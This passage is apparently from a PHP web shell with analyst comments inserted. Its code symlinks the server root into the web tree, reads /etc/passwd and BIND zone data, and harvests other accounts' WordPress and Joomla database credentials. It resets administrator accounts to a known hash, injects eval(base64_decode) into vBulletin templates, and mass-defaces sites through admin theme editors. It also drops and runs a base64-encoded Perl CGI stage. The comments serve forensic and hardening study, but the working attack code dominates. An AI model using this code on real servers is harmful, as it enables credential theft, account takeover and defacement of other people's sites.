';
} elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);
// Analyst note: setup for the "sf" (symlinker) branch of this web shell.
// Creates a world-writable `sym` directory next to the script; the @ hides any failure.
@mkdir('sym',0777);
error_reporting(0);
// The .htaccess text below maps .php and .html to text/plain and relaxes access
// control (`Satisfy Any`). The apparent intent is that PHP files reached through
// symlinks under sym/ are returned as source text instead of being executed.
// Detection: a directory holding an .htaccess with `AddType text/plain .php`
// together with symlinks that point outside the document root.
// Hardening: an AllowOverride setting that excludes Options and FileInfo stops a
// dropped .htaccess from changing handlers, MIME types or symlink following.
$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
// The fopen() result is not checked and the handle is not closed in the visible code.
$op =@fopen ('sym/.htaccess','w');
fwrite($op ,$htaccess);
echo '
Symlinker
';
// All three values come straight from the POST body with no validation; the
// statement that follows passes $target and $symfile to symlink(), so the
// requester chooses both the link target and the link name under sym/.
$target = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];
if ($symlink) {@symlink("$target","sym/$symfile");
echo '
'.$symfile.'
';
}} elseif(isset($_GET['x']) && ($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);
$user = $_POST['user'];
$pass = md5($_POST['pass']);
function ex($text,$a,$b){$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}if($config && ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';
");
$username = ex($config,'$user = \'',"';
");
$dbname = ex($config,'$db = \'',"';
");
$prefix = ex($config,'$dbprefix = \'',"';
");
$host = ex($config,'$host = \'',"';
");
$email = ex($config,'$mailfrom = \'',"';
");
$formn = ex($config,'$fromname = \'',"';
");
// Analyst note: connects with the database credentials that were string-parsed out
// of the fetched configuration text above. mysql_* is the legacy ext/mysql API
// (removed in PHP 7), which dates this sample.
$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());
// On failure the die() message echoes the parsed username, password, host and
// database name into the HTTP response.
mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);
// The UPDATE has no WHERE clause: every row in `<prefix>users` receives the same
// username, the same unsalted MD5 password value, `usertype` 'Super Administrator'
// and block = 0. $user is concatenated from the POST body without escaping.
// Detection: all accounts in the users table sharing one username and one
// 32-hex-character password value. Recovery needs a restore of the users table
// and rotation of the database credentials, since the config file was readable.
$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");
if ($query) {echo '
Done !
site name | user | password | email |
---|
'.$formn.' | '.$user.' | '.$_POST["pass"].' | '.$email.' |
';
}else {echo '
ERROR !
';
}}else die('
Not a joomla config
');
}else {
?>
S. No. | Domains | Users | Symlink |
";
$dcount = 1;
foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "
" . $dcount . " | ".$domains[1][0]." | ".$user['name']." | Symlink |
";
flush();
$dcount++;
}}}echo "";
}else{$TEST=@file('/etc/passwd');
if ($TEST){@mkdir("k2",0777);
@chdir("k2");
exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "
S. No. | Users | Symlink |
";
$dcount = 1;
$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
while(!feof($file)){$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;
echo "" . $dcount . " | " . $matches . " | ";
echo "Symlink |
";
$dcount++;
}fclose($file);
echo "
";
}else{if($os != "Windows"){@mkdir("k2",0777);
@chdir("k2");
@exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "
server symlinker
id | Users | Symlink |
";
$temp = "";
$val1 = 0;
$val2 = 1000;
for(;
$val1 <= $val2;
$val1++) {$uid = @posix_getpwuid($val1);
if ($uid)$temp .= join(':',$uid)."\n";
}echo '
';
$temp = trim($temp);
$file5 = fopen("test.txt","w");
fputs($file5,$temp);
fclose($file5);
$dcount = 1;
$file = fopen("test.txt", "r") or exit("Unable to open file!");
while(!feof($file)){$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;
echo "" . $dcount . " | " . $matches . " | ";
echo "Symlink |
";
$dcount++;
}fclose($file);
echo "
";
unlink("test.txt");
} else echo "
Cannot create Symlink";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);
?>
Folder Mass Defacer
";
$dir=opendir("$mainpath");
while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
$code=@file_get_contents($indexurl);
$finish=@fwrite($start,$code);
if ($finish){echo "»
$row/$file »
Done
";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "
Vbulletin index changer
";
}else{$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$perfix = $_POST['perfix'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
// Analyst note: removes the backslash in front of single quotes in the POSTed
// replacement content before it is embedded below.
$index=str_replace("\'","'",$index);
// Builds the value stored in the template row: a `{${eval(base64_decode(...))}}`
// expression wrapping base64 of an `echo '<content>';` statement, followed by
// `{${exit()}}`. Presumably the forum software evaluates template text when it
// renders the page, which would make this stored code run on each view -- confirm
// against the affected vBulletin version.
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo '$index';
");
$set_index .= "\'))}}{\${exit()}}";
// Overwrites the FORUMHOME row of `<perfix>template`; the table prefix and the
// connection details all come from the POST body.
// Detection: template rows containing `eval(base64_decode` or `${exit()}`.
// Cleanup means restoring the template row from a known-good backup, not only
// editing the visible page.
$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
if($ok){echo "Defaced
";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'boom')){error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '';
while ($i <= 7) {$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}return $pass;
}function index_changer_wp($conf, $content) {$output = '';
$dol = '$';
$go = 0;
$username = entre2v2($conf,"define('DB_USER', '","');
");
$password = entre2v2($conf,"define('DB_PASSWORD', '","');
");
$dbname = entre2v2($conf,"define('DB_NAME', '","');
");
$prefix = entre2v2($conf,$dol."table_prefix = '","'");
$host = entre2v2($conf,"define('DB_HOST', '","');
");
$link=mysql_connect($host,$username,$password);
if($link) {mysql_select_db($dbname,$link) ;
// Redundant re-assignment; $dol already holds '$' from the top of this function.
$dol = '$';
// Analyst note: rewrites the account with ID 1 in `<prefix>users` to login 'admin'
// with a fixed 32-hex-character hash. The function later posts a hardcoded
// password to wp-login.php, so the hash presumably corresponds to that value --
// not verified here.
// Detection: this literal hash in the user_pass column is a direct indicator of
// compromise; an affected site needs the account reset and its DB credentials
// and secret keys rotated.
$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
} else {$output.= "[-] DB Error
";
}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
$data = mysql_fetch_array($req);
$template = $data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
$data = mysql_fetch_array($req);
$current_theme = $data["option_value"];
$useragent="Mozilla/4.0 (compatible;
MSIE 7.0b;
Windows NT 5.1;
.NET CLR 1.1.4322;
Alexa Toolbar;
.NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"action=logout");
if($pos === false) {$output.= "[-] Login Error
";
} else {$output.= "[+] Login Successful
";
$go = 1;
}if($go) {$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'
');
$_file = entre2v2($buffer0,'
');
if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Updated Successfuly
";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'
');
$_file = entre2v2($buffer0,'
');
if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template Updated Successfuly
";
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
$cond = 1;
}} else {$output.= "[-] index.php can not load in Theme Editor
";
}}}} else {$output.= "[-] DB Error
";
}global $base_path;
unlink($base_path.'COOKIE.txt');
return array('cond'=>$cond, 'output'=>$output);
}function index_changer_joomla($conf, $content, $domain) {$doler = '$';
$username = entre2v2($conf, $doler."user = '", "';
");
$password = entre2v2($conf, $doler."password = '", "';
");
$dbname = entre2v2($conf, $doler."db = '", "';
");
$prefix = entre2v2($conf, $doler."dbprefix = '", "';
");
$host = entre2v2($conf, $doler."host = '","';
");
$co=randomt();
$site_url = "http://".$domain."/administrator";
$output = '';
$cond = 0;
$link=mysql_connect($host, $username, $password);
if($link) {mysql_select_db($dbname,$link) ;
// Analyst note: no WHERE clause -- every row of `<prefix>users` is set to username
// 'admin', the same fixed 32-hex-character hash, `usertype` 'Super Administrator'
// and block = 0, so all legitimate accounts are overwritten at once.
// Detection: identical username and password hash on every user row; the literal
// hash value below is a usable indicator of compromise.
$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
// Counts tables matching `<prefix>extensions`; the result selects which of the two
// template-editing code paths below runs (presumably newer vs. older Joomla
// schema -- confirm).
$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {$output.= "[-] DB Error
";
}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'
";
} else {$output.= "[+] Login Successful
";
}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'
";
} else {$output.= "[-] index.php Not found in Theme Editor
";
}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
$cond = 0;
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template successfully saved
";
$cond = 1;
}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible;
MSIE 7.0b;
Windows NT 5.1;
.NET CLR 1.1.4322;
Alexa Toolbar;
.NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'";
} else {$output.= "[+] Login Successful
";
}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'";
} else {$output.= "[-] index.php Not found in Theme Editor
";
}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'');
$cond = 0;
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template successfully saved
";
$cond = 1;
}}}} else {$output.= "[-] DB Error
";
}global $base_path;
unlink($base_path.$co);
return array('cond'=>$cond, 'output'=>$output);
}function exec_mode_1($def_url) {@mkdir('sym',0777);
// Analyst note: same .htaccess technique as the symlinker branch -- .php and .html
// are mapped to text/plain and access control is relaxed for the sym/ directory.
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
// fopen() result is unchecked and the handle is never closed in the visible code.
$fp = @fopen ('sym/.htaccess','w');
fwrite($fp, $wr);
// Links the filesystem root into the web tree as sym/root. Later statements in
// this function build a URL under /sym/root/home/ and fetch other accounts'
// configuration.php and wp-config.php through the web server.
// Detection: a symlink to `/` inside a document root, and access-log requests for
// paths beginning /sym/root/home/.
// Hardening: per-account filesystem isolation, and an AllowOverride setting that
// excludes Options and FileInfo so a dropped .htaccess cannot enable this.
@symlink('/','sym/root');
// Hosted domain names are scraped from the BIND configuration; unreadable or
// missing files are silenced by @, leaving an empty domain list.
$dominios = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out[1] = array_unique($out[1]);
$numero_dominios = count($out[1]);
echo "Total domains: $numero_dominios
";
$def = file_get_contents($def_url);
$def = urlencode($def);
$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
$output = fopen('defaced.html', 'a+');
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
for($i = $st;
$i <= $numero_dominios;
$i++){$domain = $out[1][$i];
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
$infos = @posix_getpwuid($dono_arquivo);
if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $dd);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config03, $dd);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}}}echo '
';
echo '
';
echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')
';
echo 'View Total Defaced urls
';
if($_SESSION['count1']+$_SESSION['count2'] > 0){echo 'Send to Zone-H';
}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num
");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$map = array();
foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
// Analyst note: stages a second-stage script. A world-writable plsym/ directory is
// created and the base64 blob held in $dt is decoded to plsym/plsym.cc and marked
// executable.
mkdir('plsym',0777);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
// The .htaccess enables ExecCGI, FollowSymLinks and Indexes and registers `.cc` as
// a CGI script extension, so the dropped file runs when requested over HTTP.
// Detection: an .htaccess containing `AddHandler cgi-script` for an unusual
// extension, next to recently created files.
// Hardening: an AllowOverride setting that excludes Options and FileInfo blocks
// both the ExecCGI option and the handler mapping.
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
// fopen() result is unchecked before the write and close.
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
// The script is triggered by an HTTP request built from SERVER_NAME and the
// current script path, then deleted. Forensics: the file will be gone from disk,
// but the web access log should still show the request for /plsym/plsym.cc, and
// the plsym/ directory with its .htaccess and any files the script created remains.
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('//', $data, $match);
unset($match[1][0]);
$i = 1;
foreach($match[1] as $m){$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);
}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);
}$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.$i++.' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count1++;
} else {echo 'FAILED | ';
}echo '
';
}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $def);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
